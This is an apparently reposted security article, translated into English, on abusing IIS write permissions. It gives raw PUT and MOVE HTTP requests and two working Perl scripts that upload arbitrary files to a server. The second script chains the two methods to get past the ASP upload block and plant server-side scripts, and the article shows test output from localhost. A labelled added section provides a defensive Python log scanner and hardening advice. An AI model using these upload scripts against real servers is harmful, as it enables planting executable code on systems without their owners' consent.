Using IIS write permissions

xiaoxiao2021-03-06  110

Author: SuperHei

You may have seen the article "Remote analysis of IIS settings", which analyses a variety of IIS settings. Here I want to look specifically at IIS write permissions. The following section on write permissions is quoted from "Remote analysis of IIS settings":

Write permission test. To test whether a directory gives web users write permission, use the following method: telnet to the server's web port (80) and send a request:

    PUT /DIR/MY_FILE.TXT HTTP/1.1
    Host: IIS-Server
    Content-Length: 10

At this point the server returns a 100 (Continue) response:

    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Thu, 28 Feb 2002 15:56:00 GMT

Next we type 10 letters:

    AAAAAAAAAA

After AAAAAAAAAA has been sent, look at the server's response. If it is a 201 Created response:

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Thu, 28 Feb 2002 15:56:08 GMT
    Location: http://iis-server/dir/my_file.txt
    Content-Length: 0
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

then write permission on this directory is enabled. If a 403 error comes back instead, write permission is not enabled. If the server asks you to authenticate and returns 401 (Unauthorized), write permission is enabled, but not for anonymous users. If a directory has both "Write" and "Scripts and Executables" enabled, web users can upload a program and execute it. Scary! %^#$!~

Here is a brief explanation of the request:

    PUT /DIR/MY_FILE.TXT HTTP/1.1
    Host: IIS-Server
    Content-Length: 10

PUT: requests that the server store the enclosed entity under the supplied Request-URI. If the Request-URI refers to an already existing resource, the enclosed entity should be treated as a modified version of the one residing on the origin server. If the Request-URI does not point to an existing resource, and that URI is capable of being defined as a new resource by the requesting user agent, the origin server can create the resource with that URI.

Host: the address the HTTP request is sent to.

Content-Length: the length of the content. Its value must equal the size of the file being uploaded. Here we write a simple Perl program to carry out this tedious submission process. When writing the code, we open the file with binmode(). The code follows:

    #!/usr/bin/perl
    use IO::Socket;

    $argc = @ARGV;
    if ($argc != 4) {
        print "Usage: $0 127.0.0.1 80 kaka.exe /scripts/file.exe\n";
        exit;
    }
    $host = $ARGV[0];
    $port = $ARGV[1];
    $file = $ARGV[2];
    $path = $ARGV[3];
    @s    = stat("$file");
    $size = $s[7];                                  # get the file size
    print "$file size is $size bytes\n";
    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "PUT $path HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Length: $size\n\n";        # socket connected, request header sent
    open(FILE, "$file");
    binmode(FILE);                                  # open the file in binary mode
    while (read(FILE, $char, 1024)) {               # read the file data and upload it
        print $sock "$char";
    }
    print $sock "\n\n";
    @req = <$sock>;
    print "please wait...\n";
    sleep(2);
    if ($req[4] =~ /200|201/) {
        print "Upfile succeed!!!";                  # success message
    } else {
        print "Upfile faile!!!\n\n";
        print @req;                                 # on failure, print the server's error
    }
    close $sock;
    close FILE;

Now we test it:

    C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txt
    kaka.txt size is 14 bytes
    please wait...
    Upfile succeed!!!

    C:\Inetpub\scripts>dir kaka.txt
     Volume in drive C has no label.
     Volume Serial Number is 3CD1-479E

     Directory of C:\Inetpub\scripts

    2004-05-05  00:37                  14 kaka.txt
                   1 File(s)             14 bytes
                   0 Dir(s)   3,871,080,448 bytes free

Here we have successfully uploaded kaka.txt to the web directory scripts. Since the program opens the file in binary mode with binmode(), we should be able to upload other kinds of files too. Let's test an exe file:

    C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exe
    perl.exe size is 20535 bytes
    please wait...
    Upfile succeed!!!

    C:\Inetpub\scripts>dir perl.exe
     Volume in drive C has no label.
     Volume Serial Number is 3CD1-479E

     Directory of C:\Inetpub\scripts

    2004-05-05  00:42              20,535 perl.exe
                   1 File(s)         20,535 bytes
                   0 Dir(s)   3,871,031,296 bytes free

Success: an EXE can be uploaded. Does that mean any file can be uploaded? Let's test an ASP file:

    C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
    kaka.asp size is 4 bytes
    please wait...
    Upfile faile!!!

    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Tue, 04 May 2004 16:45:51 GMT

    HTTP/1.1 403 Forbidden
    Server: Microsoft-IIS/5.0
    Date: Tue, 04 May 2004 16:45:51 GMT
    Connection: close
    Content-Type: text/html
    Content-Length: 44

HTTP/1.1 403 Forbidden: failed!! The HTTP/1.1 403 Forbidden error shows that an ASP file cannot be written directly this way; writing it by POST was tested too and likewise produces an HTTP/1.1 403 Forbidden error. So how can we upload the file types that IIS handles as scripts? Besides PUT, POST and GET, IIS can also execute other methods, such as MOVE, huh! We can first upload the local ASP file to the remote host's web directory as another file type, such as TXT, and then rename it to ASP. Again we test by submitting with nc:

    D:\>nc 127.0.0.1 80
    MOVE /scripts/kaka.txt HTTP/1.1
    Host: 127.0.0.1
    Destination: http://127.0.0.1/scripts/kaka.asp

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Oct 2003 09:30:59 GMT
    Location: http://127.0.0.1/scripts/x.asp
    Content-Type: text/xml
    Content-Length: 0

MOVE successfully renamed /scripts/kaka.txt to /scripts/kaka.asp. So by combining PUT and MOVE we can write any file to IIS :). Again we use Perl to do it. The test of writing an ASP file succeeded:

    C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
    ************************************************************
    codz by ≯superhei && lanker
    ************************************************************
    kaka.asp size is 4 bytes
    please wait...
    Upfile succeed!!!
    ModifyFile success!!!

The final iiswrite.pl code follows (I wrote the first "draft" of this article in an Internet cafe; lanker tested it and finished it, thx lanker):

    #!/usr/bin/perl
    # The iiswrite script
    use IO::Socket;

    $argc = @ARGV;
    print "*" x 60;
    print "\ncodz by ≯superhei && lanker\n";
    print "*" x 60, "\n";
    if ($argc != 4) {
        print "Usage: $0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
        exit;
    }
    $host = $ARGV[0];
    $port = $ARGV[1];
    $path = $ARGV[3];
    $file = $ARGV[2];
    @path  = split("/", $path);
    $any   = pop(@path);                            # file name part of the target path
    $path1 = join("/", @path);                      # directory part of the target path
    @s    = stat("$file");
    $size = $s[7];
    print "$file size is $size bytes\n";

    # Step 1: PUT the file under a name IIS accepts (lanker.txt) in the target directory
    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Content-Length: $size\n\n";
    open(FILE, "$file") || die "Can't open $file";
    binmode(FILE);
    while (read(FILE, $char, 1024)) {
        print $sock "$char";
    }
    print $sock "\n\n";
    @req = <$sock>;
    print "please wait...\n";
    sleep(2);
    if ($req[4] =~ /200|201/) {
        print "Upfile succeed!!!\n";
    } else {
        print "Upfile faile!!!\n";
    }
    close FILE;
    close $sock;

    # Step 2: MOVE the uploaded file to the name that was actually requested
    $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
        || die "Sorry! Could not connect to $host\n";
    print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Destination: http://$host:$port$path\n\n\n\n";
    @req = <$sock>;
    if ($req[0] =~ /20\d/) {
        print "ModifyFile success!!!\n";
    } else {
        print "ModifyFile faile!!!\n";
        print @req;                                 # on failure, print the server's error
    }
    close $sock;
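As an added example, not part of the original article or its scripts, here is the defender's counterpart to the behaviour documented above: a Python helper that classifies the reply to a PUT probe the way the article does (201 means anonymous write, 401 means write but authentication required, 403 means no write) and lists which methods advertised in the Allow header would let a client change content, plus a scan over IIS W3C extended log lines that flags successful write-method requests, blocked PUT probes, and the PUT-then-MOVE pair that the iiswrite.pl script produces. The HTTP responses and log lines are constructed sample data; the W3C field names (date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status) are the standard IIS ones, the set of methods treated as "write" methods is my choice, and the file name lanker.txt in the sample log mirrors the script above.

```python
# Added example (not code from the original article): a defender's reading of
# the PUT/MOVE behaviour described above. The verdict table follows the
# article (201 -> anonymous write, 401 -> write but authentication required,
# 403 -> no write). Log lines and responses are constructed sample data, and
# the IIS W3C field names are the standard ones.
import re
from collections import defaultdict
from datetime import datetime

# HTTP/WebDAV methods that create, alter or remove content on the server
# (assumption: this set is the editor's choice, not from the article).
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def final_response(raw):
    """Return (status, headers) of the last response in raw, skipping the
    interim '100 Continue' that IIS sends before answering a PUT."""
    text = raw.replace("\r\n", "\n")
    status, headers = None, {}
    for block in text.split("\n\n"):
        if not block.startswith("HTTP/"):
            continue                      # body text, not a status block
        lines = block.splitlines()
        code = int(lines[0].split()[1])
        if code == 100:
            continue
        status, headers = code, {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return status, headers


def interpret_put_probe(raw_response):
    """Classify a PUT probe response the way the article does and list which
    advertised methods would let a client change content."""
    status, headers = final_response(raw_response)
    if status in (200, 201, 204):
        verdict = "write enabled for anonymous users"
    elif status == 401:
        verdict = "write enabled, authentication required"
    elif status == 403:
        verdict = "write not enabled"
    else:
        verdict = "inconclusive"
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return {"status": status, "verdict": verdict,
            "write_methods_advertised": sorted(allowed & WRITE_METHODS)}


def parse_w3c_log(lines):
    """Yield one dict per request line of an IIS W3C extended log."""
    fields = None
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def find_write_activity(lines, window_seconds=300):
    """Flag successful write-method requests, blocked PUT probes, and the
    PUT-then-MOVE pair (upload under a harmless name, rename to a script)
    from the same client on the same path within window_seconds."""
    findings, puts = [], defaultdict(list)
    for e in parse_w3c_log(lines):
        method, status = e["cs-method"].upper(), int(e["sc-status"])
        ts = datetime.strptime(e["date"] + " " + e["time"], "%Y-%m-%d %H:%M:%S")
        key = (e["c-ip"], e["cs-uri-stem"].lower())
        if method == "PUT" and status in (401, 403):
            findings.append(("blocked_write_probe", e["c-ip"], e["cs-uri-stem"]))
        if method in WRITE_METHODS and 200 <= status < 300:
            findings.append(("successful_write", e["c-ip"], method + " " + e["cs-uri-stem"]))
            if method == "PUT":
                puts[key].append(ts)
            elif method == "MOVE" and any(0 <= (ts - t).total_seconds() <= window_seconds
                                          for t in puts[key]):
                findings.append(("put_move_chain", e["c-ip"], e["cs-uri-stem"]))
    return findings


# Constructed sample data modelled on the article's transcripts.
SAMPLE_201 = ("HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
              "HTTP/1.1 201 Created\r\nServer: Microsoft-IIS/5.0\r\n"
              "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, "
              "PROPPATCH, SEARCH, LOCK, UNLOCK\r\nContent-Length: 0\r\n\r\n")
SAMPLE_403 = ("HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
              "HTTP/1.1 403 Forbidden\r\nServer: Microsoft-IIS/5.0\r\n"
              "Content-Length: 44\r\n\r\n<html><body>Forbidden</body></html>")
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2004-05-05 00:37:10 10.0.0.5 PUT /scripts/lanker.txt - 201",
    "2004-05-05 00:37:12 10.0.0.5 MOVE /scripts/lanker.txt - 201",
    "2004-05-05 00:40:00 10.0.0.9 GET /default.asp - 200",
    "2004-05-05 00:45:51 10.0.0.5 PUT /scripts/kaka.asp - 403",
]

if __name__ == "__main__":
    print(interpret_put_probe(SAMPLE_201))
    print(interpret_put_probe(SAMPLE_403))
    for finding in find_write_activity(SAMPLE_LOG):
        print(finding)
```

On a site that has no legitimate WebDAV clients, any successful_write finding is already out of place; the put_move_chain finding is the one worth an alert, because the MOVE is the step that turns a harmless-looking upload into a script the server will execute. The fix follows from the article's own observation: do not pair Write with Scripts and Executables on the same directory, and leave PUT and MOVE disabled where they are not needed.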

Please cite the original address when reposting: https://www.9cbs.com/read-101387.html
